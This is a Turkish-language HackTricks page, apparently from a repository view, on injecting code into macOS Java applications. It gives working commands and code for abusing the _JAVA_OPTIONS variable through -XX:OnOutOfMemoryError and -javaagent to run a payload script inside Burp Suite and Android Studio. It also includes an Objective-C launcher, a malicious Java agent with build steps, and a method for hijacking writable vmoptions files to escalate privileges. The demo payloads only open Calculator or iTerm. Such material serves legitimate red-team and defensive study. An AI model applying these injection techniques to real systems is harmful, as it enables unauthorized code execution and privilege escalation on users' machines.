hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
2024-02-10 18:14:16 +00:00

8.2 KiB
Raw Blame History

macOS Java Uygulamaları Enjeksiyonu

AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları:

Numaralandırma

Sistemde yüklü olan Java uygulamalarını bulun. Info.plist içindeki Java uygulamalarının bazı java parametrelerini içerdiği ve bu parametrelerin java. dizesini içerdiği fark edildi, bu yüzden buna göre arama yapabilirsiniz:

# Search only in /Applications folder
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null

# Full search
sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null

_JAVA_OPTIONS

Çevre değişkeni _JAVA_OPTIONS, bir Java derlenmiş uygulamanın yürütülmesinde keyfi Java parametrelerinin enjekte edilmesi için kullanılabilir:

# Write your payload in a script called /tmp/payload.sh
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"

Yeni bir işlem olarak çalıştırmak için ve mevcut terminalin alt işlemi olmadan kullanabilirsiniz:

#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker

int main(int argc, const char * argv[]) {
@autoreleasepool {
// Specify the file path and content
NSString *filePath = @"/tmp/payload.sh";
NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";

NSError *error = nil;

// Write content to the file
BOOL success = [content writeToFile:filePath
atomically:YES
encoding:NSUTF8StringEncoding
error:&error];

if (!success) {
NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
return 1;
}

NSLog(@"File written successfully to %@", filePath);

// Create a new task
NSTask *task = [[NSTask alloc] init];

/// Set the task's launch path to use the 'open' command
[task setLaunchPath:@"/usr/bin/open"];

// Arguments for the 'open' command, specifying the path to Android Studio
[task setArguments:@[@"/Applications/Android Studio.app"]];

// Define custom environment variables
NSDictionary *customEnvironment = @{
@"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
};

// Get the current environment and merge it with custom variables
NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
[environment addEntriesFromDictionary:customEnvironment];

// Set the task's environment
[task setEnvironment:environment];

// Launch the task
[task launch];
}
return 0;
}

Ancak, bu yürütülen uygulamada bir hata tetikleyecektir, daha gizli bir yol ise bir Java ajanı oluşturmak ve şunu kullanmaktır:

export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"

# Or

open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"

{% hint style="danger" %} Uygulamadan farklı bir Java sürümüyle ajan oluşturmak, ajanın ve uygulamanın çalışmasını çökerte bilir. {% endhint %}

Ajan aşağıdaki gibi olabilir:

{% code title="Agent.java" %}

import java.io.*;
import java.lang.instrument.*;

public class Agent {
public static void premain(String args, Instrumentation inst) {
try {
String[] commands = new String[] { "/usr/bin/open", "-a", "Calculator" };
Runtime.getRuntime().exec(commands);
}
catch (Exception err) {
err.printStackTrace();
}
}
}

{% endcode %}

Ajanı derlemek için şunu çalıştırın:

javac Agent.java # Create Agent.class
jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar

manifest.txt dosyasıyla:

Premain-Class: Agent
Agent-Class: Agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true

Ve ardından çevre değişkenini ihraç edin ve java uygulamasını şu şekilde çalıştırın:

export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"

# Or

open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"

vmoptions dosyası

Bu dosya, Java çalıştırıldığında Java parametrelerinin belirtilebileceği bir dosyadır. Önceki hilelerden bazılarını kullanarak java parametrelerini değiştirebilir ve işlemi keyfi komutlarla çalıştırabilirsiniz.
Ayrıca, bu dosya include diziniyle diğer dosyaları da dahil edebilir, bu nedenle dahil edilen bir dosyayı da değiştirebilirsiniz.

Dahası, bazı Java uygulamaları birden fazla vmoptions dosyası yükleyebilir.

Android Studio gibi bazı uygulamalar, bu dosyaların nerede arandığını çıktılarında belirtir, örneğin:

/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions

2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions

Eğer yapmazlarsa, bunu kolayca kontrol edebilirsiniz:

# Monitor
sudo eslogger lookup | grep vmoption # Give FDA to the Terminal

# Launch the Java app
/Applications/Android\ Studio.app/Contents/MacOS/studio

İlginç olan şudur ki, bu örnekte Android Studio, herhangi bir admin grubundaki kullanıcının yazma erişimine sahip olduğu /Applications/Android Studio.app.vmoptions dosyasını yüklemeye çalışıyor.

AWS hackleme konusunda sıfırdan kahraman olmak için htARTE (HackTricks AWS Red Team Expert)'ı öğrenin!

HackTricks'i desteklemenin diğer yolları: